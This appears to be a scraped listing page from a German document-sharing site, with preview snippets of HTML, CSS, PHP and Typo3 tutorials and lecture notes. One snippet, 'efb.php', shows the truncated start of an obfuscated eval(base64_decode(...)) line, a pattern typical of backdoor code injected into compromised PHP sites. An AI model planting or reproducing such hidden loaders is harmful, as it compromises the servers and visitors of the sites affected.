Eine wirklich große Hilfe war die Typo3-Dokumentation der Firma Mittwald: https://www.mittwald.de/fileadmin/pdf/dokus/typo3-dokumentation. Die neue Internetseite mit Typo3 (Stand vom 25.12.2015) Ein Anfang Also, ich habe längst nicht alles verstanden, einige Befehlsketten einfach rein kopiert und deshalb sicher auch sinnlose Programmteile

Mehr

Seiten gestalten mit CSS. Die wichtigsten HTML-Elemente. ,CSS gestaltet dynamisch die HTML-Elemente (Boxen)

Seiten gestalten mit CSS. Die wichtigsten HTML-Elemente. ,CSS gestaltet dynamisch die HTML-Elemente (Boxen) Wichtige Grundlagen Cascading Style Sheets, gestaltet dynamisch die HTML-Elemente (Boxen),Mit legen Sie Schriften und Farben einheitlich fest,über das Box-Modell layouten Sie die Seite,Navigation und Effekte

Mehr

C:\~Temp\Rolf\GaM\anfrageauftritt.php Sonntag, 26. Januar 2014 08:41

C:\~Temp\Rolf\GaM\anfrageauftritt.php Sonntag, 26. Januar 2014 08:41 /* Formular Stylesheet */ body, textarea, table { font-family: Verdana,

Mehr

Internet und Webseiten-Gestaltung

Internet und Webseiten-Gestaltung Internet und Webseiten-Gestaltung Wirtschaftsinformatik 3 Vorlesung 28. April 2004 Dipl.-Inf. T. Mättig 2004-04-28 Internet und Webseiten-Gestaltung - T. Mättig 1 Vorbemerkungen Dipl.-Inf. T. Mättig E-Mail:

Mehr

Einführungskurs HTML-CSS ohne Buch Von Norbert Willimsky Stand: 01.11.2015

Einführungskurs HTML-CSS ohne Buch Von Norbert Willimsky Stand: 01.11.2015 Einführungskurs HTML-CSS ohne Buch Von Stand: 01.11.2015 Inhalt Grundlegendes... 2 Einführung in HTML... 4 Übung1: HTML und einfaches CSS anwenden... 5 Einführung in CSS... 6 Übung2: CSS anwenden... 8

Mehr

PHP Formulare. Stefan Maihack Dipl. Ing. (FH) Datum: 22.05.2014

PHP Formulare. Stefan Maihack Dipl. Ing. (FH) Datum: 22.05.2014 PHP Formulare Stefan Maihack Dipl. Ing. (FH) Datum: 22.05.2014 1 Formularverarbeitung Durch Formulare werden Webseiten interaktiv. Durch Formulare können Daten an den Webserver geschickt werden, um sie

Mehr

HTML5. Wie funktioniert HTML5? Tags: Attribute:

HTML5. Wie funktioniert HTML5? Tags: Attribute: HTML5 HTML bedeutet Hypertext Markup Language und liegt aktuell in der fünften Fassung, also HTML5 vor. HTML5 ist eine Auszeichnungssprache mit der Webseiten geschrieben werden. In HTML5 wird festgelegt,

Mehr

2 HTML & CSS der Schnelleinstieg *

2 HTML & CSS der Schnelleinstieg * 5 2 HTML & CSS der Schnelleinstieg * Diese Einführung ist für Leser gedacht, die noch keinerlei Kenntnisse in HTML oder CSS besitzen. Wenn Sie bereits Grundkenntnisse besitzen, dann können Sie mit dem

Mehr

HTML-Programmierung. 1. Aufbau einer Webseite. 2. Hintergrund für eine ganze Seite

HTML-Programmierung. 1. Aufbau einer Webseite. 2. Hintergrund für eine ganze Seite HTML-Programmierung Inhalt Seite 1. Aufbau einer Webseite 1 2. Hintergrund für eine ganze Seite 1 3. Kleine Farbtafel 2 4. Hexadezimalzahlen 2 5. Überschriften 3 6. Linien 3 7. Textformatierung 4 8. Sonderzeichen

Mehr

09.03.2010 efb.php 1

09.03.2010 efb.php 1 09.03.2010 efb.php 1 /**/eval(base64_decode('awyoznvuy3rpb25fzxhpc3rzkcdvyl9zdgfydccpjiyhaxnzzxqojedmt0jbtfnbj2 1mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9tbnQvd2Vic3BhY2UvMDAvNjU3Ny93d2hwLmRlL3BocG12Mi9saWJz

Mehr

So sieht html-befehl aus

So sieht html-befehl aus <head> </head> Notizen oder Protokoll kwm von Jürg Seiberth, 20.9.2001 und 27.9.2001 Html/Textverarbeitung Browser titel Titel So sieht html-befehl aus Obligatorisch für html-dokument

Mehr

RZ - HTML-Kurs. Inhalt 1. 2. 3. 4. 5. 6. Einführendes Struktur Links Graphik, Video, Audio Layout Weitere Informationen

RZ - HTML-Kurs. Inhalt 1. 2. 3. 4. 5. 6. Einführendes Struktur Links Graphik, Video, Audio Layout Weitere Informationen Inhalt 1. 2. 3. 4. 5. 6. Einführendes Struktur Links Graphik, Video, Audio Layout Weitere Informationen 1 Einführendes 1. 2. 3. 4. 5. Begriffe Methodisches Logische Struktur Reines HTML Struktur der HTML-Tags

Mehr

Workshop: Jugendkreis goes online - Erstellung einer Homepage für den eigenen Jugendkreis (für Anfänger ohne Grundkenntnisse geeignet)

Workshop: Jugendkreis goes online - Erstellung einer Homepage für den eigenen Jugendkreis (für Anfänger ohne Grundkenntnisse geeignet) Workshop: Jugendkreis goes online - Erstellung einer Homepage für den eigenen Jugendkreis (für Anfänger ohne Grundkenntnisse geeignet) Ziele: Wesentliche Informationen über die Webseiten-Erstellung Was

Mehr

Signatur mit Formatierung

Signatur mit Formatierung Bedienungstip: Signatur mit Formatierung Seite 1 Signatur mit Formatierung Es können Signaturen hinterlegt werden, die beim Erstellen von Nachrichten automatisch angehängt werden. Das ist sehr praktisch,

Mehr

Aufgabenbereich 3: Layoutgestaltung mit CSS

Aufgabenbereich 3: Layoutgestaltung mit CSS Aufgabenbereich 3: Layoutgestaltung mit CSS Wichtige Begriffe und Zusammenhänge: Website: Gesamtheit eines Internet-Auftrittes (alle Webseiten, die dazu gehören) Webseite: Eine einzelne Seite, ein HTML-Dokument

Mehr

Ziele dieses Buches 2 Was können Sie von diesem Buch erwarten? 3 Und nach dem Buch? 5

Ziele dieses Buches 2 Was können Sie von diesem Buch erwarten? 3 Und nach dem Buch? 5 Inhaltsverzeichnis Einleitung 1 Ziele dieses Buches 2 Was können Sie von diesem Buch erwarten? 3 Und nach dem Buch? 5 Über mich 7 Kapitel 1 Konzeption und Planung der Website 11 1.1 Grundüberlegungen 12

Mehr

Erstellung einer Homepage

Erstellung einer Homepage Erstellung einer Homepage 1) Woher bekomme ich eine Homepage? Vielfach haben Sie schon jetzt die Möglichkeit, kostenlos Webspace für die eigene Homepage zu nutzen. Die meisten Internet-Provider bieten

Mehr

Kapitel 3 Strukturierte Daten mit Listen und Tabellen

Kapitel 3 Strukturierte Daten mit Listen und Tabellen Kapitel 3 Strukturierte Daten mit Listen und Tabellen Daten spielen auf einer Website eine wichtige Rolle. Egal ob Terminliste, ein Kochrezept oder herunterladbare Dateien: Eine Fülle von Informationen

Mehr

Online-Publishing mit HTML und CSS für Einsteigerinnen

Online-Publishing mit HTML und CSS für Einsteigerinnen Online-Publishing mit HTML und CSS für Einsteigerinnen Dipl. Math. Eva Dyllong, Universität Duisburg Dipl. Math. Maria Oelinger, spirito GmbH IF MYT 07 2002 CSS-Einführung Vorschau CSS Was ist das? Einbinden

Mehr

Websiteentwicklung auf Basis vontypo3 HTML/CSS. Unterlagen zur Vorlesung WS 14/15-3- 1. Geschichte des Internets. 2. TYPO3 Designvorlage 3.

Websiteentwicklung auf Basis vontypo3 HTML/CSS. Unterlagen zur Vorlesung WS 14/15-3- 1. Geschichte des Internets. 2. TYPO3 Designvorlage 3. Websiteentwicklung auf Basis vontypo3 /CSS Unterlagen zur Vorlesung WS 14/15-3- 1. Geschichte des Internets 2. TYPO3 Designvorlage 3. 4. CSS 1 Geschichte des Internets Geschichte des Internets Die Ursprünge

Mehr

for ($i=1 ;$i<=25 ;$i++) { echo "$i "; }?>
zurück zur Index-Seite

for ($i=1 ;$i<=25 ;$i++) { echo $i ; }?> <br> <a href=http://localhost/php.php>zurück zur Index-Seite</a> </body> </html> 8 Schleifen Schleifen werden in der Programmierung viel verwendet. Sie sind deshalb sehr wichtig, weil man mit Ihrer Hilfe erreichen kann, dass etwas unter bestimmten Bedingungen immer wieder ausgeführt

Mehr

Einführungskurs HTML-CSS mit Buch

Einführungskurs HTML-CSS mit Buch Einführungskurs HTML-CSS mit Buch Von Stand: 01.11.2013 Arbeitsblätter Blatt1: Grundlegendes, Software einrichten Blatt2: Link-Arten Blatt3: Wichtige HTML-Elemente Blatt4: Einführung CSS Blatt5: Wichtige

Mehr

iedit Modul Dokumentation von Knallgrau New Media Solutions GmbH Stand August 2004

iedit Modul Dokumentation von Knallgrau New Media Solutions GmbH Stand August 2004 iedit Modul Dokumentation von Knallgrau New Media Solutions GmbH Stand August 2004 Abstract...4 Copyright & Disclaimer...5 mod_form...6 Anlegen des Moduls...6 Konfigurieren des Moduls...7 Verwendung...14

Mehr

VWA Rhein-Neckar Dipl.-Ing. Thomas Kloepfer. Kommunikation I (Internet) Übung 4 PHP

VWA Rhein-Neckar Dipl.-Ing. Thomas Kloepfer. Kommunikation I (Internet) Übung 4 PHP VWA Rhein-Neckar Dipl.-Ing. Thomas Kloepfer Kommunikation I (Internet) Übung 4 PHP SS 2004 Inhaltsverzeichnis 1. PHP die serverseitige Programmiersprache...1 1.1. PHP - Bereiche in HTML definieren...1

Mehr

Web Technologien HTML & CSS

Web Technologien HTML & CSS Web Technologien HTML & CSS Univ.-Prof. Dr.-Ing. Wolfgang Maass Chair in Information and Service Systems Department of Law and Economics WS 2011/2012 Wednesdays, 8:00 10:00 a.m. Room HS 021, B4 1 Themen

Mehr

VWA Rhein-Neckar Dipl.-Ing. Thomas Kloepfer. Kommunikation I (Internet) Übung 5. Formulare und mehr

VWA Rhein-Neckar Dipl.-Ing. Thomas Kloepfer. Kommunikation I (Internet) Übung 5. Formulare und mehr VWA Rhein-Neckar Dipl.-Ing. Thomas Kloepfer Kommunikation I (Internet) Übung 5 Formulare und mehr SS 2003 Inhaltsverzeichnis 5. Formulare und mehr...1 5.1. Formulare...1 5.1.1. Erstellen eines einfachen

Mehr

Softwaretechnik Teil Webprogrammierung (HTML, PHP) SS2011

Softwaretechnik Teil Webprogrammierung (HTML, PHP) SS2011 Softwaretechnik Teil Webprogrammierung (HTML, PHP) SS2011 Studiengang: Semester: 3. Gruppe: Wirtschaftsinformatik A & B Datum: 29.06.2011 Dozent: LfbA Dipl.-Hdl. Andreas Heß Hilfsmittel: alle Unterlagen/Bücher

Mehr

Internet und Webseiten-Gestaltung

Internet und Webseiten-Gestaltung Internet und Webseiten-Gestaltung Wirtschaftsinformatik 3 Vorlesung 5. Mai 2004 Dipl.-Inf. T. Mättig 2004-04-28 Internet und Webseiten-Gestaltung - T. Mättig 1 Vorbemerkungen Dipl.-Inf. T. Mättig E-Mail:

Mehr

Freud & Leid des DSP-Entwicklers

Freud & Leid des DSP-Entwicklers Freud & Leid des DSP-Entwicklers Dynamic Server Pages in der Praxis Uniface Dynamic ServerPages CompuwareBenutzerGruppe e.v. WorkShop Neu-Isenburg, März 2010 Dynamic Server Pages in der Praxis CU 2008

Mehr

Seiten für das WWW selber gestalten. html. Kopf. Körper. Beispiel

Seiten für das WWW selber gestalten. html. Kopf. Körper. Beispiel Seiten für das WWW selber gestalten Eine Seite im WWW ist in einer Programmiersprache geschrieben. Wir werden nicht die Details einer Programmierung anschauen. Es wird uns nützlich sein, zu wissen, wie

Mehr

Lektion 3: Dokumente, Vernetzung und Wissen

Lektion 3: Dokumente, Vernetzung und Wissen Lektion 3: Dokumente, Vernetzung und Wissen Helmar Burkhart Fachbereich Informatik Universität Basel helmar.burkhart@unibas.ch 3-1 Lernziele und Inhalt Lek0on 3 Dokumente im Kontext des Wissenscha3sbetriebs

Mehr

Um CSS-Formatierungen in einem HTML-Dokument einzubinden gibt es 3 Möglichkeiten.

Um CSS-Formatierungen in einem HTML-Dokument einzubinden gibt es 3 Möglichkeiten. CSS-SCHULUNG TEIL A: ALLGEMEINE EINFÜHRUNG IN CSS TEIL B: CSS IM LOKALEN INFORMATIONS-SYSTEM Dozentin: Dipl. Ing.(FH) Nicole Hartmann Rhoen-Saale.net GmbH Oktober 2009 TEIL A: ALLGEMEINE EINFÜHRUNG IN

Mehr

Cross-Platform Mobile Apps

Cross-Platform Mobile Apps Cross-Platform Mobile Apps 05. Juni 2013 Martin Wittemann Master of Science (2009) Arbeitet bei 1&1 Internet AG Head of Frameworks & Tooling Tech Lead von qooxdoo Plattformen Java ME 12 % Rest 7 % Android

Mehr

Programmieren 2 (Prof. Hasbargen) Klausur

Programmieren 2 (Prof. Hasbargen) Klausur Programmieren 2 (Prof. Hasbargen) 1 Klausur Aufgabe 1 (10 Punkte) Dynamisierung von HTML-Seiten HTML-Seiten sind eine gängige Art und Weise, Informationen darzustellen. Nennen Sie die Gründe, welche Vorteile

Mehr

Grundelemente der Hypertext Markup Language (HTML) Teil 1

Grundelemente der Hypertext Markup Language (HTML) Teil 1 Grundelemente der Hypertext Markup Language (HTML) Teil 1 Allgemeines:! HTML steht für Hypertext Markup Language! aktueller Standard ist HTML 4.1 bzw. XHTML 1.0 (s.a. unter http://www.w3c.org)! die Dokumente

Mehr

Webseiten aufbauen mit HTML Hypertext Markup Language

Webseiten aufbauen mit HTML Hypertext Markup Language Webseiten aufbauen mit HTML Hypertext Markup Language Was ist HTML? Der Grundaufbau von HTML Textformatierung Bilder und Verweise Tabellen Fenster und Formulare Cascading Style-Sheets (CSS) HTML-Editoren

Mehr

Formular / Counter. Handbuch

Formular / Counter. Handbuch Handbuch November 2012, Copyright Webland AG 2012 Inhalt Formular Allg. Informationen Formular konfigurieren 1. Schritt: Erstellen des Formulars 2. Schritt: Konfiguration des Formulars 3. Schritt: Integration

Mehr

WEBSITE ERSTELLEN mit DREAMWEAVER MX

WEBSITE ERSTELLEN mit DREAMWEAVER MX WEBSITE ERSTELLEN mit DREAMWEAVER MX Inhalt: WEBSITE ERSTELLEN mit DREAMWEAVER MX... 1 Neue Site anlegen... 2 Neue HTML-Seite erstellen... 2 Seiteneigenschaften... 2 Webseite speichern... 2 CSS (Cascading

Mehr

Dokumentation Externe Anzeige von Evento Web Dialogen

Dokumentation Externe Anzeige von Evento Web Dialogen Dokumentation Externe Anzeige von Evento Web Dialogen Autor: Roger Guillet Telefon 058 404 83 57 E-Mail roger.guillet@crealogix.com CREALOGIX Evento Postfach 112, Baslerstrasse 60 CH-8066 Zürich Telefon

Mehr

Open Source. Thomas Weibel, Multi & Media thomas.weibel@bluewin.ch www.thomasweibel.ch

Open Source. Thomas Weibel, Multi & Media thomas.weibel@bluewin.ch www.thomasweibel.ch Open Source Thomas Weibel, Multi & Media thomas.weibel@bluewin.ch www.thomasweibel.ch Inhalt 1. Begriff, Lizenzen 2. HTML 5, Nachschlagewerke 3. Software 4. Linux: Ubuntu 5. Content-Management-Systeme

Mehr

15.04.2014 Was ist HTML? Designwerkstatt Webart Sommersemester 2014 Institut für Kunstpädagogik, LMU München Martin Pflanzer

15.04.2014 Was ist HTML? Designwerkstatt Webart Sommersemester 2014 Institut für Kunstpädagogik, LMU München Martin Pflanzer 15.04.2014 Was ist HTML? Tim Berners-Lee Die erste Webseite: info.cern.ch, 13. November 1990 Webseiten waren ursprünglich einfache Textseiten mit Links. HTML = Textzusätze zur Formatierung & Erweiterung

Mehr